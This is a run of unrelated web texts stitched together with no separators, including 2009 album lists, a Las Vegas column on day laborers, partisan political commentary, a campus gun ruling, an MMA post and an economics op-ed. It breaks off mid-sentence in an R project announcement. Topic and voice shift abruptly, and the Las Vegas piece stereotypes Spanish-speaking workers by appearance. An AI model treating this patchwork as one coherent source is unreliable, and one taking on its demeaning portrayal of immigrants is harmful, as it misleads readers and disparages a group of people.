Spectral choral music for the driftless .
Recommended for those who thought Sigur Rós were too structured for their tastes .
7. Animal Collective - Fall Be Kind
Animal Collective - Fall Be Kind
" What Would I Want ? Sky " ( buy )
Animal Collective became one of the most fashionable bands to hate on this year for releasing one of the most inventive and enjoyable albums of 2009 ( funny how that works , huh ? ) .
Regardless of your undoubtedly fixed opinions on the band , Avey Tare , Panda Bear , and Geologist appear to be completely oblivious to the maelstrom of hype and web 2.0 academic treatises they 've sparked as a result of Merriweather Post Pavilion and decided to cap the year off with one of their most curiously cohesive and playful EPs yet .
6. Flying Lotus - L.A. EP 3 X 3
Flying Lotus - LA EP 3X3
" Infinitum ( Dimlite 's Re-finitum ) " ( buy )
It 's utterly inconceivable to me how music like this was conceived .
It 's like a photo negative of a what I expect a song to be : textures are reconfigured as percussion ; beats are spliced , reversed , and processed into jittery , techno - futurist melodies ; vertical planes become three - dimensional vectors ; up is down ; black is white ; rhythm is the bass , and the bass is the treble .
If this is what the future sounds like , I remain hopeful that I 'll get my hoverboard after all .
5. Jon Hardy & The Public - Little Criminals : Songs From Randy Newman
LITTLE CRIMINALS by Jon Hardy & the Public from the FOUNTAINstudio on Vimeo . ( download )
It was meant to be a brief affair : for one night only , St. Louis ' hardest working band was going to pay tribute to one of America 's greatest living songwriters .
But the resulting collaboration played to the others ' strengths so well that it would have been criminal to lose the effect to the woozy memory of bar lore .
Randy Newman tends to play the role of a satirical schlemiel , but when his work is played with the forthrightness and brio of Jon Hardy & The Public the songs feel invigorated with new purpose and meaning .
Great songwriting should allow for artful interpretation , and both are present here .
4. Beirut - March of the Zapotec / Realpeople Holland
Beirut - March of the Zapotec / Realpeople Holland
" My Night with the Prostitute from Marseilles " ( buy )
March of the Zapotec / Realpeople Holland is an odd job .
It 's two completely separate EPs , really .
For Zapotec , Zach Condon took his Balkanized brass balls down to Oaxaca , Mexico to recruit a ragtag band of native horn blowers to backtrack his somber , wayfaring songs .
It 's fine ; about what you 'd expect .
But what really got me excited was Holland , " Realpeople " being Condon 's nom de plume for his pre-Beirut bedroom pop project .
The resulting tracks can be a little undeveloped at points , but the strange juxtaposition of Condon 's mournful croon with the wistful gurgling of cheap electronics produces some of the most listenable synth pop this side of the Magnetic Fields ' Holiday .
3. Washed Out - Life of Leisure
Washed Out - Life of Leisure
" New Theory " ( buy )
Beachy , headphonic , chill .
During the interminably long Summer of Death , 2009 , the slow jam sampledelica of Ernest Greene 's Washed Out provided just the sort of escapist and nostalgic salve needed to reassure anxiety - wracked blogbros that everything was going to be a -okay .
2. Destroyer - Bay of Pigs
Destroyer - Bay of Pigs
When it was announced that Dan Bejar was going to release a 13 - and - a - half minute " ambient disco " track based loosely around the botched Bay of Pigs invasion , there was no doubt that it was going to be anything short of epic .
And where Kennedy failed with his CIA - trained Cuban exiles , Bejar delivered .
Even in the most obtuse sense , I 'm still not sure what - if anything - the song " Bay of Pigs " has to do with the actual event in 1961 , but with blisteringly surreal lyrics about how " a ransom note written on the night sky above remind me what , in particular , about this wine I love , " I 'm not about to start complaining .
Bejar is in fine form here , popping up like a harrowed and woolly narrator to regale us of the time he was trapped inside the sea's guts or bathed in golden sunlight , only to recede back into the foggy aether of synthesizer just as mysteriously as he arrived .
The acoustic guitar , when it finally kicks in , feels like a life raft - the sturdiest , most reliable instrument in sight .
If it were n't for a certain French band who penned a tune about a Hungarian composer , this would be the single greatest song of the year .
Oh , and there 's another track on this EP .
It 's okay .
1. El Perro del Mar - Love Is Not Pop
El Perro del Mar - Love Is Not Pop
" Heavenly Arms " ( buy )
There 's a lot to love here : the battered sincerity of 1980's Lou Reed , the fluid bounce of Balearic funk , the spectre of G.K. Chesterton , the amorous and classical voice of Sarah Assbring .
This is n't a happy record - El Perro del Mar 's rarely are - but it 's spiritually nourishing , full of poignant and unchained melodies that exude a deep , inner warmth .
It 's a remarkable maturation for Ms. Assbring as a songwriter , who has set aside the conventions of 1960s girl group acts here for the light groove of organic dub , but it 's the maturity and patience demonstrated within these songs that give them their allure .
Tom 's Favorite Albums
The problem with maintaining a digital music library is that it gets so easy to acquire that there 's hardly time left to appreciate .
So while I easily listened to over 100 new releases in 2009 , each met with at least a modicum of enthusiasm and anticipation , looking back there were only a handful that truly resonated with me and begged for repeated listens as the year wore on .
There were plenty more quality releases that I could have included here , and some of my choices may be obvious to people who ( like me ) spend an unhealthy amount of time reading and writing these sorts of lists , but these are probably my 10 favorite albums of 2009 :
10 . Bill Callahan - Sometimes I Wish We Were An Eagle
" Too Many Birds " ( buy )
For someone with a voice as oaken and stout as Bill Callahan's , he sure has a fleet - footed deftness in tackling ephemeral subjects , crafting Byzantine - tinged fables about familial burdens or grappling with the sudden loss of a perfect song that appeared in a dream and dissipated in the morning .
This album , for me , is a little like an old Navy peacoat : heavy and maybe a little musty at times , but reliably built and familiar enough with broken - in grooves to comfortably return to when the weather demands it .
9. St. Vincent - Actor
" Marrow " ( buy )
I 'm unreasonably suspicious of music that 's too polished ; it 's probably some kind of latent handicap in music appreciation that resulted from being weaned on grunge and punk and the circumstantial necessity of recording imperfections in early rock and roll .
It 's like I need to hear a bum note or cracked voice every now and then to know it 's human and not factory - made .
But this year , faced with a definite resurgence of scrappy and ( g ) lo - fi bands , I found my patience with that old way of thinking wearing thin , and it took St. Vincent with a flawless orchestral pop record - with overtures to Disney scores , even ! - to break through and show the error of my thinking .
Actor is a pitch - perfect construct , but still emotionally heartfelt and filled with inventive and bedazzling compositions .
Hell , even the feedback and discord is exquisite .
It also helped that St. Vincent 's live show was one of the best I saw all year .
8. A Sunny Day in Glasgow - Ashes Grammar
" Close Chorus " ( buy )
There was a lot of top - notch shoegaze revival - type stuff this year - Memory Tapes , Fuck Buttons , the Big Pink - but it was A Sunny Day in Glasgow that really reinvented the genre in their own image .
Sure , there are echoes of your Lovesliescrushings and All Natural Lemon and Lime Flavors , but Ashes Grammar requires total immersion - it's a record so texturally rich and rhythmically fluid that it 's impossible to wrap your head around it in just one , or twenty - one , listens .
7. Pomegranates - Everybody , Come Outside !
" This Land Used To Be My Land , But Now I Hate This Land " ( buy )
I probably recommended this record to friends and strangers more than any other this year .
It really boggles my mind that Everybody , Come Outside !
did n't catch on more than it did - a concept album loosely based on a restless time traveler , with influences equal parts Fela Kuti and the Wrens .
What 's not to love ?
This album has so much heart and charm , plus , it 's filled with some of my single favorite moments laid to tape in 2k9 - the zany chorus on " Southern Ocean " where the boys shout the names of all the other oceans and feign going overboard ; the exhausted exclamation " I 'm so tired of living in a city where I can't see the stars at night ! " on " This Land Used To Be My Land , But Now I Hate This Land ; " the guitar lick on " Svaatzi Uutsi . "
This album is rife with the spirit of adventure , and I can't wait to see where the Pomegranates go next .
6. Fever Ray - s/t
" When I Grow Up " ( buy )
Gothic , gnomic , unmistakeably Scandinavian - Fever Ray 's self - titled debut was one of the most original and eerily engrossing albums of the year .
It 's hard to put it on and not be transported to an alternate dreamworld where mossy synths slink under pebble - skipped beats and mechanically monolithic voices emanate out of thin air .
But for all the dark curvatures of Fever Ray 's planet , there is a light , or at least an organic glow , that emits under every surface , making it curiously uplifting .
5 . The Pains of Being Pure at Heart - s/t
" Come Saturday " ( buy )
How did this make it so high on my list ?
The curmudgeonly critic in me feels obligated to gripe about how unoriginal the Pains of Being Pure at Heart are , how their whole sound is one big derivative trawl of so many obscure twee bands of yore that even mentioning C86 would be to obvious , how even their cover art rips off My Bloody Valentine .
But you know what , my inner curmudgeon can stuff it , because I love this album .
I love the everlivin ' shit out of it .
I put this on when I 'm feeling down , when I 'm feeling good , when I 'm staring at spreadsheets , and when I 'm getting my drank on .
I listen to it all the goddamn time .
Why ?
Because they sound like a hundred other bands I like , but better .
4. Animal Collective - Merriweather Post Pavilion
" In the Flowers " ( buy )
For better or worse , Merriweather Post Pavilion has become the defining album of the year : the object of massively hysterical online hype , the heralded savior of a post - guitar / bass / drums indie landscape , a Billboard - climbing success that introduced broad swaths of casual listeners to subterranean electro - psychedelia , an impassable line in the sand for testy critics , a prime example of everything wrong with music today .
But , to my ears , MPP still sounds as weird and invigorating today as it did when I first heard it 12 months ago .
Each track pulses with life - bulging , pumping bass rhythms that you feel in your gut ; playfully infectious harmonies ; gleaming and luminous electronics laid down so thick it 's like being bathed in starlight .
This is music to get lost to .
3 . The xx - xx
" Basic Space " ( buy )
Out of the 11 tracks on xx , there are at least six that are stone cold singles .
At least .
I wo n't dwell on how young these London kids are , or how meticulously cohesive their debut aesthetic is , or how they unintentionally went toe - to - toe with Peter Bjorn and John in revitalizing a Young Marble Giants - indebted minimalist R&B style in 2009 and wound up schooling the whistling Swedish indie stars , but I feel I should emphasize how good this band is .
They 're really fucking good .
Breathy boy - girl vocals , echoic guitars that are just teased , never battered , leaving most of the rhythm up to the imagination .
With so many bands clamoring for attention by being louder , faster , flashier , it 's refreshing to find a group willing to pull back and let you come after them .
2. Phoenix - Wolfgang Amadeus Phoenix
" Lisztomania " ( buy )
Wolfgang Amadeus Phoenix is at or near the top of plenty of " Best of 2009 ? lists .
This is not shocking .
It 's a brilliantly executed , head - to - toe catchy , glossy pop tour de force .
What is shocking is how defensive its defenders are , as though there were something to be embarrassed about over rock that is ( at least partly ) soft , French , and impeccably detailed .
Apparently there are people out there who are virulently and vocally anti-Phoenix ( or at least , anti- the success of this particular album ) - this I find shocking !!
Who are these people , and how can anyone be so foolishly anti-melody , anti-hook , anti-big - lovable - chorus , anti-this - adorable - fan - made - music - video and still call themselves music fans ?
Inconceivable !
1. Dirty Projectors - Bitte Orca
" Useful Chamber " ( buy )
I listened to Bitte Orca practically every morning for three months after I first picked it up .
Just the thought of the opening windswept riff on " Cannibal Resources " causes the hairs on the back of my neck to stand on end .
But for all the time I 've invested in this record , I still find it hard to articulate in words how I feel , viscerally , about this music .
The arrangements are stark , but rhythmically complex , with the bass often played as a a lead that weaves into David Longstreth 's intricately filigreed , art - damaged Jùjú guitar work seamlessly , drum machines that mimic the palpitations of acoustic percussion , and the joyously ascendant harmonies of Angel Deradoorian and Amber Coffman that lift my stomach into my throat when the rest of the music drops out .
It 's fantastic and , without taking this too literally , spiritually revitalizing .
There are very few components to each song , but each element that is included is crucially , spectacularly vital .
Images from Design Review , 1976 .
This set at hi-res on flickr
Here in Las Vegas , Star Nurseries had a problem .
Last fall , customers began complaining about the “ day workers ” — mostly illegal aliens who have snuck across our borders from Mexico and points south — who would gather by the dozens in and near the nurseries ’ parking lots , trampling the landscaping , relieving themselves in the bushes , leaving litter and other “ waste ” behind .
When Review - Journal reporters tried to interview the men , few would talk , and none would give their full names .
The few who were willing to talk did so in Spanish .
( There ’s a Casual Labor Office that offers to place workers , on Washington Avenue downtown .
But they ask would - be workers if they have documentation showing it ’s legal for them to work in this country .
For some reason , the short , dark - complected , only - Spanish - speaking men who gather in the nursery parking lots do n’t use that service .
Why do you think that is ? )
Instead , customers complained the men were so aggressive in offering their services as part - time lawn and garden workers that the customers felt harassed .
“ They were standing in the parking lot , destroying property , ” explains Pat Chapin , an attorney for Star Nursery .
“ If a car slowed down , they would converge on it . ”
Jan George , a neighbor who lives near the nursery at Charleston Boulevard and Cimarron Road , told Review - Journal reporter Lynette Curtis she is n’t “ opposed to people looking for work if they need it . ”
But “ It does n’t look nice in a residential community to see 30 guys standing out on a street corner , ” she adds .
So last fall , the management put up temporary chain - link fences to keep the men out of their parking lots and off their property .
Seeing how serious the problem had become , city and county authorities decided to intervene , sending out enforcement agents to write citations and threaten fines .
Citations and fines against the illegal aliens , who have no right even to be in this country , let alone to mob the parking lot of a private , tax - paying business ?
No !
Are you nuts ?
That would only happen in a healthy country , where tax - paid government agents still see it as their duty to help and protect legal , tax - paying businesses .
Instead , “ code enforcement agents ” for Clark County and the City of Las Vegas cited Star Nurseries for erecting the temporary fences “ without a permit . ”
The local taxpayer was given until Jan. 6 to either tear down the fences or acquire a permit to install permanent fencing , which Mr. Chapin estimated would have cost $ 200,000 .
So instead of helping out the local property owner by rounding up the illegals and deporting them , the government took the side of the guys who ’ve been using Star Nurseries ’ bushes as their outdoor toilet !
Last week , the fences came down .
“ Money is just too tight ” for the local employer to put $ 200,000 into fencing right now , attorney Chapin explains .
Meantime , the lousy economy is really hurting businesses in downtown Las Vegas — the kind whose customers have to park in municipal garages or at city parking meters .
What commerce remains now gravitates to the suburban shopping malls , with their free parking .
So the same Jan. 11 issue of the Review - Journal that reported why Star Nurseries has taken down its chain - link fences also reports the city of Las Vegas is looking into making some changes with regards to its parking meter enforcement .
To try and help downtown businesses stay afloat , they ’re considering a reduction in parking meter rates for shoppers , as well as issuing a “ courtesy warning ” rather than a ticket if someone stays only a few minutes past the expiration of their meter .
Right ?
No !
Are you nuts ?
That would only happen in a healthy country , where tax - paid government agents still see it as their duty to help and protect the legal , tax - paying businesses that fund their salaries .
Instead , Scott Adams , Las Vegas ’ chief urban redevelopment officer , says the city — which already makes more than $ 2 million per year from parking fees and meters — is asking “ is there a way to increase revenue ? ”
Parking revenues pay for debt service on the city garages and a 20 - member staff of meter maids , and still produce a surplus for the city councilmen to spend as they see fit — despite the fact the original rationale for parking meters was merely to keep a small number of motorists from monopolizing the spaces all day .
But now , to meet budget shortfalls caused by the recession — which was largely caused and extended by “ well - meaning ” government economic interventions , in the first place — the city wants to see if there ’s way to squeeze out more parking revenues , hiking fees and fines till “ they find out where that point is where you can raise revenues and not lose customers , ” Mr. Adams explains .
There ’s a pattern here , and it ’s one of a society in the final stages of decadence , when the government ceases to be a servant of the taxpayers and instead behaves like the dog that ’s willing not merely to bite the master who feeds it , but to gnaw off an entire appendage — like the pigs taking over the farm in “ Animal Farm . ”
( Please note that all the jobs “ saved ” by the Big 2009 Stimulus Bill have been government jobs . )
Harry Pappas , whose family - owned block along Las Vegas Boulevard between Carson and Fremont was seized by the city a decade ago , still owns a small parcel of land downtown , near 6th Street and Carson .
He ’d like to rent it out to monthly parkers .
He put up a plywood sign to that effect .
So the city is threatening to fine him for putting up the sign without a permit .
But get this :
When he inquired about getting a permit , the city said they wo n’t issue him one !
“ I do n’t make enough money now to even pay the property taxes there , which is about a grand a year , ” Harry says .
“ But they want me first to get a city business license , which costs $ 150 , and then a state business license .
Then they wo n’t even let me pull the permit for the sign ; I ’ve got to have a contract with a firm they recognize , and only that company can go pull the permit , and all the companies I talked to want from $ 200 to $ 500 for the sign , ” which has to meet a set of aesthetic rules set by the city , including a requirement that it have “ a border , kind of like a picture frame , I guess . ”
The whole required operation would cost more than Harry figures he could make renting out the spaces .
( In competition with city parking meters ?
You do n’t suppose they could have set it up that way ON PURPOSE ? )
“ The last time the guy called me about the sign , last Friday , I told him to go F himself , ” Harry says .
“ I told him ‘ You bastards have screwed up this whole economy with all your licences and taxes and permits . ’
He said , ‘ Oh , so you do n’t believe in rules , is that it ? ’ ”
Power to the parasites !
But the No. 1 concern , according to the panel — which comprised of ethics officers from PricewaterhouseCoopers , Lincoln Financial and PepsiCo — was where to draw the line between personal and professional .
One of the key speakers was Jude Curtis , the chief ethics and compliance officer at PricewaterhouseCoopers , who discussed his team 's efforts in putting together an official " Social Media Policy . "
Curtis also added that PwC considered their employees ' presence on social networking sites serious enough to set up a Social Media Steering Group , which is tasked with continually reviewing their policy as the field evolves .
Pepsi's VP of Compliance , Stephen Noughton added yet another dimension to the discussion by expressing his concern :
Does a potential candidate 's presence on social media deserve a place in the traditional background check ?
While the jury is out on this one , as a jobseeker , does that worry us ?
With industry experts citing social media key for your career success , I 'm willing to bet yes on that one .
Finally , the last segment to this conversation :
We are all asked to sign a " Code of Conduct " at work , however , what happens when we flip this ?
What about the board signing an ethics policy that asks them to adhere to the triple bottom line principle when making any strategic decisions ?
Sound untraditional ?
Well , it is , but it might not be for too long as corporate social responsibility gets concretely defined across board rooms and shifts from pure advocacy quests to instrumentally changing strategic direction at corporations .
Ethics will soon have to bridge the gap from being solely an individual responsibility to a conscious common denominator in our business decisions as well .
If you 'll understand this better in business terminology , it 's also called sustainable capitalism .
More Executive Strategies on CNBC.com : Where To Find A Job NowColleges That Bring the Highest PaycheckExecutive Career Strategies
__________________________________
Aman Singh is the Corporate Responsibility Editor at Vault.com .
She is a New York University alum and previously wrote for The Wall Street Journal .
Her area of work includes corporate diversity practices and sustainability , and how they translate into recruitment and strategic development at Fortune 1000 companies .
Comments ?
Send them to executivecareers@cnbc.com
Primark was last night unavailable for comment
The high street chain , Primark , is selling £ 4 bikini sets which give children a “ breast shape ” alongside normal costumes in their seven to eight - year - old range .
The halterneck tops come in candy pink with gold stars or black with white polka dots .
Last night parents and children ’s groups called for the clothes to be withdrawn saying they could make girls targets for paedophiles .
Jenny Stallard , deputy editor of Practical Parenting and Pregnancy magazine , said : “ A padded bikini for seven - year - olds is too much at too young an age .
“ No wonder girls are confused about their bodies and self image . ”
By James Baxter , NMA President
Fighting a traffic ticket is n’t fun , at least for most people .
You ’re playing in an arena where the other side has the home field advantage , makes all the rules , owns the referees , and virtually operates without meaningful oversight .
No wonder only a tiny percentage of ticket recipients seriously set out to challenge the charges lodged against them .
Still , the justice system ’s hackles are up and it senses the need to protect its prerogatives ( and its cash flow ) .
Despite the small cadre of often ill equipped , poorly prepared , and over - matched traffic ticket defendants , the courts feel threatened and they are fighting back .
Traditionally the courts have relied on obscure rules , byzantine procedures , inconsistency from court to court and system to system , deliberately unhelpful employees , and insider collusion to keep the riff raff at bay .
Not good enough anymore ; the unwashed masses , in the form of pro-se defendants , keep cluttering up the courtrooms and threatening the vacation plans of the “ keepers of the law . ”
The new weapon of choice ; price the slugs out of the system .
Make it too expensive for the average person to even consider fighting a ticket , and woe be to thee who loses his or her challenge .
Individual judges have employed economic roadblocks and confiscatory penalties for years , but the practice was n’t systematic .
That ’s beginning to change .
Massachusetts started the ball rolling on a grand scale by charging every traffic ticket defendant $ 25 , non refundable , regardless of guilt or innocence , just to get a hearing in front of a dubiously qualified judge .
Upon failing at that level and desiring a more legitimate trial , with some semblence of rules , the erstwhile defendant must cough up another $ 50 , again , non refundable , for his date in court .
Just recently , the Indiana Legislature , under the guise of corraling a rogue judge who was slapping major fines on defendants because they had the audacity to use up his valuable time , passed a law that systematically increases the fines of ticket defendants who make a point of challenging the traffic ticket industry in court .
These people are the thin line that keep the system half way honest and the legislature ( with courthouse boosters ) has decided to throttle them with additional fines in excess of $ 500 !
Just watch this trend grow .
The passing of hundreds of arcane traffic laws every year , increasing fines to the point that they are challenging car and mortgage payments , making police officers revenue generators , and “ Public Private Partnerships ” like the combination of local governments and ticket camera merchants are creating a growing mass of otherwise passive and apathetic citizens who want to resist the egregious use of the police power to steal their money .
Where do they think they can get relief ?
The courts !
Fat chance that .
But hope springs eternal .
Voting is a right .
Many decades ago governments used poll taxes to price minorities out of the voting booth .
These people were being denied their right to vote through the government sanctioned use of financial penalties .
They were n’t called that but that was what they were .
The courts eventually admitted the obvious and prohibited this practice .
Due process is a right .
Currently the government uses fees , penalties , fines , and a host of non-financial strategies to deny due process to the average citizen who wants to challenge a traffic ticket .
The techniques are not always overt , but they serve the purpose of discouraging , if not making it impossible to fight a ticket .
But here ’s the rub , unlike the poll tax , traffic ticket revenue is the mothers milk of state and local court systems .
Will they ever willingly pull free of the traffic ticket teat ?
I fear not .
Rep. Pete Hoekstra told Fox News ' Chris Wallace Sunday that it is " fair " to hold the Obama administration responsible for the a failure to detect an attempted terror attack .
Friday , Hoekstra told the Detroit Free Press that the Obama administration needed to " connect the dots . "
" You were quoted in the Detroit Free Press this morning as saying that , you know , the key is to connect the dots and maybe the Obama administration will now realize that .
Is it really fair to hold the Obama administration responsible here ? " asked Wallace .
" Yeah , I think it really is , " replied Hoekstra .
" Connecting the dots here is not really on this particular case .
It 's connecting the dots that we 've seen over the last 11 months , over the last eight years . "
John Amato :
What depths will these conservative hacks sink to as they attack President Obama ?
For what I have no idea .
Hoekstra has n't even been briefed on the attacks , but he has his talking points ready .
Does he also hold Bush and Cheney accountable for the 9/11 attacks , the anthrax attacks and the shoe bomber attack ?
That would have been a proper follow up question from Chris Wallace , but that would never happen .
And since no one was hurt in the newest try unlike what happened under Bush , Hoekstra should be praising Obama .
Maybe Broder should come out and ask conservatives to show some sanity and act more moderate --- for once or comment on the fact that Hoekstra is a ' world - class buffoon ' as Steven Benen notes :
How such a world - class buffoon became the ranking member on the House Intelligence Committee remains an open question , though it continues to be something of an embarrassment for the Republican caucus .
There are a couple of angles to this to keep in mind .
First , Hoekstra would like people to believe the Obama administration is n't taking the terrorist threat seriously enough .
The evidence to the contrary -- a.k.a. " reality " -- is overwhelming .
Second , when it comes to national security issues , Hoekstra has one of the more transparently ridiculous track records of any member of Congress in recent memory .
We are , after all , talking about a partisan clown who held a press conference in 2006 to announce , " We have found weapons of mass destruction in Iraq . "
And third , yesterday 's pettiness probably has something to do with Hoekstra 's gubernatorial campaign -- he needs to impress the GOP base to win his primary , and he likely assumes cheap shots at the president in light of attempted terrorism is the way to get a bump in the polls .
One can hope the opposite will occur .
Even Republican primary voters should be disgusted by Hoekstra 's shameless hackery on this .
Yemen just happens to be an area that the Obama administration is focused on in terms of sheltering terrorists .
Rep .
Peter King is trying to top Hoekstra on the laugh - o - meter and practically committed treason by publicly exposing the information he received as soon as he was informed .
Rep. Peter King ( R - NY ) was .
And King — the ranking member of the House Homeland Security Committee — wasted no time alerting the media to much of what he was told .
King rushed to Fox and CNN last night to begin issuing blame against security officials who allowed the suspect to board .
“ His name was in a database indicating significant terrorist connections , ” King said , adding , “ I ’m not trying to be a Monday morning quarterback here … but let ’s see what was missed . ”
And their buffoonery knows no bounds .
King yesterday was complaining that President Obama did n't give a press conference and compared Friday 's incident to George Bush not being bothered to hold a press conference after Hurricane Katrina hit that devastated New Orleans .
My God !
The Colorado Court of Appeals ruled Thursday that the University of Colorado has no authority to bar students or visitors from lawfully carrying guns on campus .
The appeals court said an El Paso County district judge was wrong to dismiss a challenge filed by a group called Students for Concealed Carry on Campus and three students from the University of Colorado .
The CU Board of Regents adopted a ban on all guns on campuses , believing the statewide Concealed Carry Act ( CCA ) did not apply to universities .
But the court found that the legislature , in standardizing the rules governing concealed weapons from county to county through the CCA of 2003 , specifically intended the act to apply everywhere in the state except in a handful of places listed in the statute , like K - 12 schools .
Attorney Jim Manley , who represents the plaintiffs , called the ruling “ a real victory for individual freedom ” and the law .
“ When the legislature says statewide , it means statewide , ” said Manley , an attorney for the Mountain States Legal Foundation .
“ The regents wanted to read in an exception that did n’t exist .
The court of appeals rejected that . ”
Rule challenged in 2008
The University of Colorado originally banned guns on campuses in 1970 .
The policy allows students to keep guns in lockers with campus police .
Generally speaking , a handful of students store hunting rifles in those lockers and are allowed to transport them across campus .
The CCA requires those who carry concealed firearms to pass a background check and be at least 21 years old .
After the CCA passed , the regents asked then - Attorney General Ken Salazar if the CCA applied to CU .
Salazar ruled it did not .
That opinion stood unchallenged until December 2008 , when the lawsuit was filed in the wake of the fatal Virginia Tech University shootings , after universities rushed to ban guns on campuses , and , at the same time , some students moved to overturn bans .
After Thursday ’s ruling , the lawsuit may go back to district court , or CU can appeal the decision to the Colorado Supreme Court .
The university could also repeal the ban if it so chooses .
Ken McConnellogue , spokesman for the University of Colorado system , said school officials are weighing options .
Regents will likely discuss the matter at a regularly scheduled board meeting next week .
“ For us , the issue has always been about more than ‘ guns are good or guns are bad , ’ ” McConnellogue said .
“ For us , it ’s been the issue of autonomy for the Board of Regents to govern the CU campuses as the Colorado Constitution stipulates .
In that regard , it ’s disappointing . ”
A national anti-gun group urged the CU system to appeal the ruling .
“ We are disappointed by this ruling that could result in students and transient visitors carrying loaded semi-automatic weapons at the University of Colorado , ” Paul Helmke , president of the Washington , D.C. - based Brady Center to Prevent Gun Violence , said in a written statement .
CSU ban faces lawsuit
The ruling also could impact a gun ban passed in February by Colorado State University officials , over the objections of gun-rights groups .
The local chapter of Students for Concealed Carry on Campus and Rocky Mountain Gun Owners filed suit in Larimer District Court on Thursday against CSU over its ban , hoping for the same result the court of appeals delivered .
Supporters of the bans , at CU and CSU , have argued that they contribute to preventing mass shootings like the one at Virginia Tech .
CSU students who oppose the ban , however , believe it leaves them defenseless in the event a criminal gets on campus with a gun .
“ This is definitely a step in the right direction , ” said Tim Campbell , head of Students for Concealed Carry on Campus at CSU , of the appellate ruling .
“ This just makes our case stronger . ”
CSU attorneys are reviewing the appeals court decision , said CSU spokeswoman Michele McKinney .
Weapons policies on the CSU campuses have not yet been implemented .
Martha Altman , one of the three student - plaintiffs , has graduated from UC Denver .
She said the public has a misunderstanding in thinking that every student is packing a gun in universities that do n’t have bans .
Altman applauded Thursday ’s ruling .
“ Our interpretation is that the regents had overstepped their bounds , ” Altman said .
“ They should follow the law of the state of Colorado , and the appeals court made that clear . ”
This article has been corrected in this online archive .
Originally , this story said that the University of Colorado first reapproved the gun ban in 2004 .
The original 1970 gun ban was strengthened and reapproved in 1994 .
Sorry , I could n't find that page ...
I tried my best , I really did !
But at the end of the day , I 'm just a script running on a web server .
I can only do so much .
Try starting back at the home page .
So I 'm not hating on the guy , but do I think he can beat GSP ?
No , I do n't .
As always , you can be proven wrong and yes one solid hit could put GSP 's lights out .
But I just do n't think that 's going to happen .
Once bitten , twice shy - and GSP never wants to feel the title seizing bite of the underdog ever again .
I think that the thrashing Matt Serra handed out to GSP created some kind of a mutation process that changed him as a fighter permanently .
If someone is going to beat this guy , I do n't see it happening with another lucky punch .
Maybe when he 's Couture 's age , but not yet .
Dan Hardy is good , but he 's still a young fighter and I see this one going down just like GSPs first title match against Hughes .
Just too much , too early for a guy with potential who needs more time .
We 'll see what happens .
Look , a lot of people seem to have the shits with Dan Hardy .
He 's cocky , he 's arrogant blardy blah .
I personally like him for two simple reasons .
1 . He makes me laugh2 .
He smashes people in the face really hard That 's all I need really and I 'm entertained .
Whether you like it or not , MMA is about entertainment .
This guy is entertaining and the Dan Hardy GSP trash talk is hilarious .
And , I gotta say I was surprised to see some pretty slick Kung Fu from Hardy in the last Primetime installment .
I do n't know how long this will be up for , but at the moment you can watch the show here :
( ' ’)
During the 1990s , the inflationary policy of the U.S. Federal Reserve fueled a tech - stock bubble .
When that bubble burst , the Fed inflated a larger one in real estate .
Now that the real estate bubble has burst , the Fed is inflating the biggest bubble of them all – a bubble in government .
While the earlier booms provided at least the illusion of prosperity – as well as some fun while they lasted – the government bubble will cripple the economy and deliver widespread misery to the vast majority of Americans .
Of course , there will be winners in the government bubble – at least for a while .
As was the case with the stock and real - estate bubbles , plenty of money will be made by the well - connected and parasitic classes .
Government employees will continue to enjoy pay raises at our expense , as will anyone benefiting from the new wave of subsidies , such as Wall Street investment bankers , financial speculators , and those working in healthcare or education .
These gains will come at the expense of the taxpayers who foot the bill and the consumers who face higher prices .
As government grows , it " crowds out " the private sector , depriving it of the resources it needs to survive and grow .
The result is a lower overall standard of living .
Not only are government jobs less productive than private sector jobs , but bureaucratic interference actually makes the remaining private sector jobs less efficient , as well .
Our economy is being transformed from a mostly capitalistic one to a mostly socialistic one .
More decisions are being made by politicians and lawyers in Washington and fewer by entrepreneurs .
The motivation behind this shift is the mistaken belief that the financial crisis of 2008 was caused by too much capitalism and a lack of proper government oversight .
This conclusion is self - serving for those in power , and could n't be more economically misguided .
Through corruption or just plain ignorance , Congress and the Obama administration have embraced an ideology that has failed every time it has been tried .
Take the recent student loan reforms that were slipped into the healthcare bill .
U.S. President Barack Obama wants to reduce the cost of providing student loans by taking the profits out of the industry .
According to President Obama , student loans are too expensive because banks profit from making them .
If the government nationalizes the function , we would apparently bring down costs by eliminating those pesky profits .
This is a Marxist argument , pure and simple .
If true , it would apply to all industries , not just banking .
States like Cuba and North Korea would be the envy of the world , as they prohibit profits across the board .
The truth is that profits – earned from free - market competition – keep cost down .
By taking the profits out and putting the bureaucrats in , any incentive to provide better service or lower costs is eliminated .
It 's not hard to predict that student - loan costs will now rise faster than ever .
That is clearly not the result we want .
To solve the problem , people must understand that college tuitions are so expensive specifically because the government has guaranteed student loans .
Guaranteed loans do n't mean more access to education , but rather that universities are free to charge more per pupil than if their customers were paying out - of - pocket .
President Obama 's plan only serves to remove more market forces and creates an even bigger moral hazard .
Under the new rules , students will be required to repay a much smaller portion of what they borrow .
As a result , students will be willing to borrow even greater amounts of cash to pay inflated tuitions , making it that much easier for colleges and universities to raise them .
Also , since the government will actually be loaning the money directly – rather than simply guaranteeing private - sector loans – the U.S.
Treasury will actually have to borrow the money itself before it can re-lend it to students .
I suppose the irony of going into debt to loan money never registers in Washington .
Further , as this bill will cause tuitions to rise even faster , it will necessitate even larger loans that will produce even greater taxpayer losses when the loans end in default or forbearance .
Whether it is in education , housing , healthcare , automobiles , insurance , or banking , greater government involvement in the economy means higher prices , lower productivity , more bailouts , bigger deficits , increased taxes , diminished industrial capacity , fewer private - sector jobs , less freedom , and a falling standard of living .
In the end , when runaway inflation and skyrocketing interest rates burst the government bubble , there will be no more bubbles to replace it – just one hell of a hangover .
[ Editor 's Note : Peter D. Schiff , Euro Pacific Capital Inc.'s president and chief global strategist , is a well - known author and commentator , and is a periodic contributor to Money Morning .
Schiff is the author of two New York Times best sellers : " Crash Proof : How to Profit from the Coming Economic Collapse , " as well as " The Little Book of Bull Moves in Bear Markets . "
His latest book is " Crash Proof 2.0 : How to Profit from the Economic Collapse . "
Schiff also publishes The Global Investor newsletter .
For more information on that newsletter , please click here . ]
During COVID - 19 we are open and here for you !
We are shipping orders as usual
I was delighted to see the following e-mail post from Dirk Eddelbuettel regarding the google - summer - of - code R google group :
* * *
Earlier today Google finalised student / mentor pairings and allocations for
the Google Summer of Code 2010 ( GSoC 2010 ) .
The R Project is happy to
announce that the following students have been accepted :
Colin Rundel , “ rgeos – an R wrapper for GEOS ” , mentored by Roger Bivand of
the Norges Handelshoyskole , Norway
Ian Fellows , “ A GUI for Graphics using ggplot2 and Deducer ” , mentored by
